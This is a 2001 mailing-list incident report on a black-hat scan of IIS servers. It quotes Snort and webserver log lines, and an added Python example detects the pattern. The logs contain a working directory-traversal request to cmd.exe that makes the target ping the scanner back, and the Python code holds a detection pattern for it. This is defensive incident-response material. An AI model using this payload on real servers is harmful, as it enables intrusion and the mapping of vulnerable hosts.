Security Incidents mailing list archives

Sneaky vuln-scanning, vulnerable list generation


From: "Keith.Morgan" <Keith.Morgan () Terradon com>
Date: Fri, 27 Jul 2001 13:08:34 -0400

I don't think this is a worm.  I think this is most probably a black-hat
scanning technique.

Note the command the scanner attempted to execute.  A single ping-back to
the scanning machine.  This would allow the scanner to easily generate a
list of vulnerable boxen.

Attached are intrusion detection system and webserver logs in EST.

Jul 27 11:02:30 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2724 -> Pub.IP.Address:80
Jul 27 11:02:34 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2828 -> Pub.IP.Address:80
Jul 27 11:02:37 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2927 -> Pub.IP.Address:80
Jul 27 11:02:45 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2724 -> Pub.IP.Address:80
Jul 27 11:02:55 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2924 -> Pub.IP.Address:80
Jul 27 11:03:10 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2924 -> Pub.IP.Address:80

2001-07-27 11:02:39 24.41.72.83 - Private.IP.Address 80 8r?@?GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -
2001-07-27 11:02:56 24.41.72.83 - Private.IP.Address 80 8r?@?GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -


Keith T. Morgan
Chief of Information Security
Terradon Communications
keith.morgan () terradon com
304-755-8291 x142
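
Added example (not part of the original post or of any tool it mentions): a log check that separates the ping-back pattern described above, where the injected command targets the requesting host itself, from other cmd.exe traversal attempts. The field layout follows the IIS excerpt in the post; the sample lines, the 10.0.0.5 and 192.0.2.x addresses, and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the layout of the IIS log excerpt above:
# date time client-ip - server-ip port method uri query status -
SAMPLE_LOG = """\
2001-07-27 11:02:39 24.41.72.83 - 10.0.0.5 80 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -
2001-07-27 11:02:56 24.41.72.83 - 10.0.0.5 80 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -
2001-07-27 11:05:01 192.0.2.10 - 10.0.0.5 80 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir 404 -
2001-07-27 11:06:12 192.0.2.44 - 10.0.0.5 80 GET /index.html - 200 -
"""

# First dotted-quad that follows a "ping" token in the decoded request.
PING_TARGET = re.compile(r"\bping\b.*?\b(\d{1,3}(?:\.\d{1,3}){3})\b")

def classify(line):
    """Return (client_ip, status, verdict), or None for unrelated lines."""
    f = line.split()
    if len(f) < 10:
        return None
    client, status = f[2], f[-2]
    # Everything between the port and the status is method + URI + query.
    # Decode %xx, turn '+' into spaces, normalise backslashes and case.
    request = unquote(" ".join(f[6:-2])).replace("+", " ")
    request = request.replace("\\", "/").lower()
    if "cmd.exe" not in request or "../" not in request:
        return None
    m = PING_TARGET.search(request)
    if m and m.group(1) == client:
        verdict = "ping-back-to-source"   # command calls back to the requester
    else:
        verdict = "command-execution-attempt"
    return client, status, verdict

def summarize(log_text):
    """Map each offending client IP to its verdicts and the HTTP statuses seen."""
    report = {}
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            client, status, verdict = hit
            entry = report.setdefault(client, {"verdicts": set(), "statuses": set()})
            entry["verdicts"].add(verdict)
            entry["statuses"].add(status)
    return report

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(ip, sorted(info["verdicts"]), sorted(info["statuses"]))
```

The recorded statuses show how the server answered each request, which a responder needs alongside the verdict.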

